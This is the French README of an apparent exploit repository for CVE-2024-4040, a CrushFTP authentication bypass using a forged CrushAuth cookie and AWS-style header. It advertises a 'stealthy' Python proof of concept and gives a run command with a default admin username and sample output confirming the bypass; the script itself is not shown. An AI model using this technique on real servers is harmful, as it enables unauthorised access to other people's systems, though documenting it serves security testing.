
Exploit pour CVE-2024-4040 – Contournement d'authentification dans CrushFTP via le cookie CrushAuth et l'usurpation d'en-tête de style AWS. PoC Python furtif avec génération de jeton sécurisée, contournement SSL et sortie améliorée.
Ce dépôt contient un exploit furtif en Python (preuve de concept) pour CVE-2024-4040, une vulnérabilité critique dans CrushFTP (v10 et inférieur) qui permet à un attaquant de contourner l'authentification en utilisant un cookie CrushAuth falsifié et un en-tête Authorization de style AWS.
Un attaquant non authentifié peut contourner l'authentification dans les instances vulnérables de CrushFTP en forgeant une combinaison spécifique de cookie/en-tête, obtenant un accès non autorisé aux fonctions Web internes.
CrushAuth utilisant secretsAuthorization falsifié valide de style AWSrequests)python3 CVE-2024-4040.py http://target-ip:8080 --valid_username crushadmin
target_url — URL de base du serveur CrushFTP
--valid_username — Utilisateur valide connu (défaut : crushadmin)
🔍 Exemple de sortie
[*] CrushFTP Authentication Bypass Exploit
[*] Targeting: http://192.168.1.10:8080
[*] Using username: crushadmin
[+] Exploit Result:
Status_Code : 200
Response_Text : {"getUserNameResponse":{"user_name":"crushadmin"}}
[+] CrushFTP Server is VULNERABLE!
Ce code est destiné uniquement à des fins éducatives et de tests de sécurité autorisés. Ne l'utilisez pas contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de tester.
Réusinage du PoC : illdeed